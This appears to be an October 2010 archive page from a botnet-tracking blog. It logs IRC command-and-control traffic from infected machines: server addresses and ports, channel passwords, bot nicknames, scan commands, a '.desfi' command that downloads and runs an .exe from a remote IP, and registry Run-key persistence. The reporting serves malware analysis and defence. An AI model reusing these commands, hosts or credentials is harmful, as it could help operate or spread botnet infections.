Month: October 2010

Remote Host Port Number 4c.59.85ae.static.theplanet.com 25 168.143.62.231 25 173.12.132.82 25 174.120.139.61 25 204.3.73.205 25 209.85.227.27 25 216.146.33.7 25 216.230.241.211 25 63.231.199.37 25 64.182.102.193 25 205.134.160.74 80 85.17.94.148 80 91.211.117.76 80 69.42.218.75 8878 ircd here 85.17.94.148 8080 USER dfhmiynb dfhmiynb dfhmiynb :qxujoylh NICK vpOjlDGlp MODE vpOjlDGlp +xi JOIN #maxi USERHOST vpOjlDGlp MODE #maxi +smntu PONG :lols.nope.comRead more...

Remote Host Port Number 46.4.229.246 51987 USER rA rA rA rA NICK [rA|USA|XP|22289] JOIN #testtorrent nokey PRIVMSG #testtorrent : 4New Torrent Infection PING :IRC.Secret.GoV Other details * The following port was open in the system: Port Protocol Process 1051 TCP taskhost.exe (%AppData%taskhost.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + InternetRead more...

nice.niceshot.in 67.202.108.130 nice.niceshot.in 67.202.108.14 C&C Server: 67.202.108.130:6567 PASS s1m0n3t4 Server Password: Username: XP-8720 Nickname: [SI|DEU|00|P|91959] Channel: #nuevocsm# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://209.217.224.53/~chinchad/pa/gom.exe c:WINDOWSsali.exe 1 C&C Server: 67.202.108.14:6567 Server Password: Username: XP-6573 Nickname: [SI|DEU|00|P|59178] Channel: #nuevocsm# (Password: c1rc0dus0leil) Channeltopic: :.desfi http://209.217.224.53/~chinchad/pa/gom.exe c:WINDOWSsali.exe 1 Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Ci Servs” =Read more...

Remote Host Port Number 70.61.101.163 9595 PASS prison 72.233.89.199 80 91.198.22.70 80 PONG leaf.989.com NICK {iNF-00-USA-XP-COMP-2202} USER MEAT * 0 :COMP JOIN ###mini NICK {00-USA-XP-COMP-2562} Now talking in ###USA Topic On: [ ###USA ] [ .scan SVRSVC_ENG 100 10 0 -c ] Topic By: [ pe[ro ] Modes On: [ ###USA ] [ +smntu ]Read more...

Remote Host Port Number 88.208.209.166 81 NICK n|USA|XP|COMPUTERNAME|fusjplw USER n “” “lol” :n JOIN #new# PONG 422 PONG :request.not.found Registry Modifications * The newly created Registry Value is: o [HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun] + MSNUpdateServices = “%AppData%S-3685-5437-5687minsfot.exe” so that minsfot.exe runs every time Windows starts File System Modifications * The following files were created in the system: #Read more...

(IRC) [00|FRA|345724]: Bot sniff “124.40.3.92:8080” to “192.168.0.11:20782”: – “:hub.2217.net 221 fiqzkCnjy + :fiqzkCnjy!qospkdIFi@rue92-5-82-241-173-16.fbx.proxad.net JOIN :##+ :hub.2217.net 332 fiqzkCnjy ##+ :*sc ne 130 0 0 -e -b -r -s|*sc nb1 50 0 0 -e -b -r -s “

(IRC) [00|ESP|780449]: Bot sniff “192.168.1.101:1340” to “64.16.193.53:3921”: – “MODE ESP[XP|SP2]00[L]693632 -xt+iB JOIN #p4s r00t USERHOST ESP[XP|SP2]00[L]693632 MODE ESP[XP|SP2]00[L]693632 -xt+iB JOIN #p4s r00t USERHOST ESP[XP|SP2]00[L]693632 MODE ESP[XP|SP2]00[L]693632 -xt+iB JOIN #p4s r00t USERHOST ESP[XP|SP2]00[L]693632 MODE ESP[XP|SP2]00[L]693632 -xt+iB JOIN #p4s r00t

(IRC) [00|ESP|065790]: Bot sniff “203.190.166.115:7562” to “190.208.80.238:2071”: – “:b2js4nd5v3u!XPESP82221@190.208.80.238 JOIN :#100+ :ftpelite.mine.nu 332 b2js4nd5v3u #100+ : :ftpelite.mine.nu 333 b2js4nd5v3u #100+ Chakra 1287762402 “ “USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts JOIN #100+ hzx USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts JOIN #100+ hzx USERHOST b2js4nd5v3u MODE b2js4nd5v3u +i MODE #100+ +nts JOIN #100+Read more...

(IRC) [D00|ESP|77291]: Bot sniff “64.16.193.53:9595” to “88.31.150.71:1293”: – “:ESP|XP|SP0|00|1600|W|999986!jjhqift@71.Red-88-31-150.staticIP.rima-tde.net JOIN :#!sql# :HTTP1.4 302 ESP|XP|SP0|00|1600|W|999986 :ESP|XP|SP0|00|1600|W|999986=+jjhqift@71.Red-88-31-150.staticIP.rima-tde.net :HTTP1.4 302 ESP|XP|SP0|00|1600|W|999986 :ESP|XP|SP0|00|1600|W|999986=+jjhqift@71.Red-88-31-150.staticIP.rima-tde.net “

(IRC) [00|ESP|065790]: Bot sniff “204.45.85.210:47221” to “190.208.80.238:2765”: – “:hub.us.com 001 [N00_ESP_XP_2575850]___ :us, [N00_ESP_XP_2575850]___!SP2-383@190.208.80.238 : :hub.us.com 005 [N00_ESP_XP_2575850]___ :[N00_ESP_XP_2575850]___!SP2-383@190.208.80.238 JOIN :#dpi :hub.us.com 332 [N00_ESP_XP_2575850]___ #dpi :finito :hub.us.com 333 [N00_ESP_XP_2575850]___ #dpi str 1287854526 :hub.us.com 353 [N00_ESP_XP_2575850]___ @ #dpi :